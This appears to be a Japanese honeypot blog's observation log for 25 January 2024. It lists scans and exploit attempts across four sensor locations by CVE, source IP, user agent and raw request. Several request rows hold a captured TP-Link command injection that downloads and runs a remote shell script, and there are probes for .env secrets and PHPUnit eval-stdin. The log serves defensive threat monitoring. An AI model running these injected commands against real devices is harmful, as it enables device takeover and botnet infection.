2024/01/25 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/01/25分です。

特徴

共通

CensysInspectによるスキャン行為
/.envへのスキャン行為

Location:JP

zgrabによるスキャン行為
.jsへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
configファイルへのスキャン行為

を確認しました。

Location:UK

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:SG

GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
/.gitへのスキャン行為
5.188.210.227に関する不正通信

を確認しました。

他

アクセス数推移

JP：総アクセス数：106 (前日比：-64)
US：総アクセス数：110 (前日比：25)
UK：総アクセス数：261 (前日比：-143)
SG：総アクセス数：130 (前日比：-1)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.161	Romania
20	18.171.242.86	United States
2	47.254.25.10	United States
4	62.210.10.186	France
1	71.6.134.231	United States
1	71.6.134.235	United States
2	78.153.140.175	Russia
2	78.153.140.177	Russia
2	78.153.140.224	Russia
23	91.92.247.167	Bulgaria
3	101.32.192.203	Singapore
1	104.192.0.61	United States
4	135.125.217.54	France
11	135.125.244.48	France
2	139.59.58.140	Singapore
2	139.99.28.148	Canada
2	142.93.187.22	United States
1	159.203.69.154	United States
1	167.248.133.185	United States
1	185.180.143.71	Portugal
1	185.180.143.189	Portugal
1	185.216.71.4	Bulgaria
1	185.224.128.191	Netherlands
6	185.254.196.173	Ukraine
3	185.254.196.186	Ukraine
1	198.199.113.99	United States
2	205.210.31.132	United States
2	205.210.31.136	United States
3	221.126.232.61	Hong Kong

UserAgent一覧

件数	UserAgent
8	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
28	`-`
1	`Go-http-client/1.1`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 8.0.0; F5121) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
29	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
23	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`*\xef\x18\xc5E\xee\tx`\x10\x04\xb0\x7f\xf3`
1		`MGLNDD_18.179.20.5_80\n`
2		`\x16\x03\x01\x01H\x01`
3		`\x16\x03\x01\x01\x07\x01`
19		`\x16\x03\x01`
1		`\xcc\x1b\xd8^\vJB\t`\x11\x04\xb0\xeb:`
1	CONNECT	`pro.ip-api[.]com:443`	HTTP/1.1
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
1	GET	`/.blog`	HTTP/1.1
1	GET	`/.env.backup`	HTTP/1.1
1	GET	`/.env.example`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
29	GET	`/.env`	HTTP/1.1
1	GET	`/API/.env`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/PSIA/index`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/blog/.env`	HTTP/1.1
1	GET	`/blog`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
1	GET	`/cl/9_md/9/9/9/9/999999`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/dev/.env`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/sendgrid/.env`	HTTP/1.1
1	GET	`/server/.env`	HTTP/1.1
1	GET	`/shop/.env`	HTTP/1.1
1	GET	`/sites/.env`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/test/.env`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/vendor/.env`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
3	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	POST	`/onvif/device_service`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	8.137.106.178	Singapore
7	35.216.233.65	United States
1	36.99.136.136	China
1	45.79.172.21	United States
1	45.79.181.223	United States
1	47.88.5.56	United States
1	47.254.76.138	United States
1	52.80.177.122	China
13	54.36.115.221	France
8	54.234.205.144	United States
1	65.49.1.94	United States
3	74.82.47.2	United States
3	75.119.145.61	Germany
2	78.153.140.224	Russia
2	83.97.73.245	Germany
8	90.151.171.106	Russia
10	90.151.171.108	Russia
8	95.214.235.169	Ukraine
1	139.59.101.104	Singapore
2	142.93.187.22	United States
13	161.35.189.40	United States
2	162.142.125.220	United States
2	167.94.145.56	United States
2	167.94.146.52	United States
1	167.99.135.0	United States
1	185.161.248.148	United Kingdom
3	185.224.128.191	Netherlands
1	192.241.219.61	United States
2	198.235.24.20	United States
2	198.235.24.78	United States
2	205.210.31.159	United States
1	209.97.147.47	United States
3	221.126.232.61	Hong Kong

UserAgent一覧

件数	UserAgent
30	`-`
1	`Go-http-client/1.1`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 10; itel L5006C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Mobile Safari/537.36`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15`
1	`Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebkit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
9	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z73802194750Q1`
9	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0`
1	`curl/8.1.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_34.68.118.83_80\n`
1		`\x03`
3		`\x16\x03\x01\x01\x07\x01`
19		`\x16\x03\x01`
1		`\xedeq\xc2\x01\x01`
2	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
2	CONNECT	`checkip[.]amazonaws[.]com:443`	HTTP/1.1
2	CONNECT	`eth0[.]me:443`	HTTP/1.1
2	CONNECT	`ip[.]bablosoft[.]com:443`	HTTP/1.1
1	CONNECT	`v4[.]ident[.]me:443`	HTTP/1.1
23	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/aaaaaaaaaaaaaaaaaaaaaaaaaqr`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104[.]168[.]5[.]4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh)`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/gate.php`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
2	GET	`http[:]//api[.]ipify[.]org?Z73802194750Q1`	HTTP/1.1
2	GET	`http[:]//checkip[.]amazonaws[.]com?Z73802194750Q1`	HTTP/1.1
2	GET	`http[:]//eth0[.]me?Z73802194750Q1`	HTTP/1.1
2	GET	`http[:]//ip[.]bablosoft[.]com/?Z73802194750Q1`	HTTP/1.1
1	GET	`http[:]//v4[.]ident[.]me?Z73802194750Q1`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.129.45.136	United States
19	18.135.16.201	United States
1	45.79.172.21	United States
1	45.79.181.223	United States
8	54.36.115.221	France
2	54.37.79.75	France
7	57.129.23.166	France
1	65.49.20.66	United States
1	66.240.205.34	United States
1	71.6.134.233	United States
3	74.82.47.3	United States
2	78.153.140.177	Russia
2	78.153.140.224	Russia
2	83.97.73.245	Germany
12	90.151.171.106	Russia
93	90.151.171.108	Russia
4	93.174.95.106	United Kingdom
8	95.214.235.169	Ukraine
41	112.213.110.8	Hong Kong
1	117.184.26.242	China
34	120.199.82.50	China
1	139.59.101.104	Singapore
1	157.245.11.30	United States
2	162.142.125.215	United States
1	162.243.141.30	United States
1	167.71.243.127	United States
2	167.94.138.52	United States
2	178.128.95.222	United States
3	185.224.128.191	Netherlands
2	198.235.24.15	United States
2	205.210.31.175	United States

UserAgent一覧

件数	UserAgent
8	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
153	`-`
1	`Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
28	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z72612114222Q1`
29	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
27	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
48		`-`
1		`Gh0st\xad`
1		`MGLNDD_132.145.66.34_80\n`
1		`\x16\x03\x01\x01H\x01`
21		`\x16\x03\x01`
1		``
3	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
10	CONNECT	`check.best-proxies[.]ru:443`	HTTP/1.1
1	CONNECT	`checkip[.]amazonaws[.]com:443`	HTTP/1.1
5	CONNECT	`eth0[.]me:443`	HTTP/1.1
4	CONNECT	`fingerprints[.]bablosoft[.]com:443`	HTTP/1.1
1	CONNECT	`ip[.]bablosoft[.]com:443`	HTTP/1.1
4	CONNECT	`v4[.]ident[.]me:443`	HTTP/1.1
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
28	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104[.]168[.]5[.]4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh)`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//132[.]145[.]66[.]34:80/MyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/SQL/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/pma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/dbadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/mysqladmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/sqlweb/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webdb/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/websql/scripts/setup.php`	HTTP/1.0
4	GET	`http[:]//api[.]ipify[.]org?Z72612114222Q1`	HTTP/1.1
10	GET	`http[:]//check[.]best-proxies.ru/ip.php?Z72612114222Q1`	HTTP/1.1
1	GET	`http[:]//checkip[.]amazonaws[.]com?Z72612114222Q1`	HTTP/1.1
5	GET	`http[:]//eth0[.]me?Z72612114222Q1`	HTTP/1.1
4	GET	`http[:]//fingerprints[.]bablosoft[.]com/ip?Z72612114222Q1`	HTTP/1.1
1	GET	`http[:]//ip[.]bablosoft[.]com/?Z72612114222Q1`	HTTP/1.1
4	GET	`http[:]//v4[.]ident[.]me?Z72612114222Q1`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
21	18.171.238.48	United States
36	20.200.126.104	United States
1	38.68.48.24	United States
1	45.56.108.128	United States
4	45.79.172.21	United States
1	45.79.181.223	United States
9	54.37.79.75	France
7	57.129.23.166	France
1	64.62.197.22	United States
1	64.62.197.168	United States
1	64.62.197.169	United States
1	64.62.197.181	United States
1	65.0.109.166	United States
1	71.6.134.231	United States
2	78.153.140.177	Russia
2	78.153.140.224	Russia
2	83.97.73.245	Germany
1	84.54.51.254	Bulgaria
1	84.239.17.20	Romania
8	95.214.235.169	Ukraine
7	118.123.105.85	China
1	138.197.90.69	United States
2	142.93.187.22	United States
2	167.248.133.49	United States
2	172.105.128.11	United States
3	185.224.128.191	Netherlands
1	192.241.221.11	United States
2	198.235.24.146	United States
2	205.210.31.145	United States
2	205.210.31.248	United States
3	221.126.232.61	Hong Kong

UserAgent一覧

件数	UserAgent
8	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
44	`-`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
36	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36`
27	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
1		`\x03\xd4\x84\xf3\xb1\xa6\x90\x17`\x10\x04\xb0\xbf\xfa`
1		`\x12\x10;\xd7\xe5\xc19\x11`\x18\x04\xb0\xe4\x13`
1		`\x13\xc2k\xa6\xd3\x8c`U`\x18\x04\xb0\xc5\x11`
1		`\x16\x03\x01\x01H\x01`
3		`\x16\x03\x01\x01\x07\x01`
35		`\x16\x03\x01`
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
29	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/13.67.44.234/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Phpinfo/profiler`	HTTP/1.1
1	GET	`/Phpinfo`	HTTP/1.1
1	GET	`/Profiler`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/app/config/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/audio/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/base/.env`	HTTP/1.1
1	GET	`/blog/.env`	HTTP/1.1
1	GET	`/cgi-bin/.env`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104[.]168[.]5[.]4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh)`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/conf/.env`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/crm/.env`	HTTP/1.1
1	GET	`/database/.env`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/library/.env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
1	GET	`/new/.env`	HTTP/1.1
1	GET	`/newsite/.env`	HTTP/1.1
1	GET	`/old/.env`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/sites/all/libraries/mailchimp/.env`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/storage/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/vendor/.env`	HTTP/1.1
1	GET	`/vendor/laravel/.env`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-admin/.env`	HTTP/1.1
1	GET	`/wp-content/.env`	HTTP/1.1
1	GET	`/www/.env`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
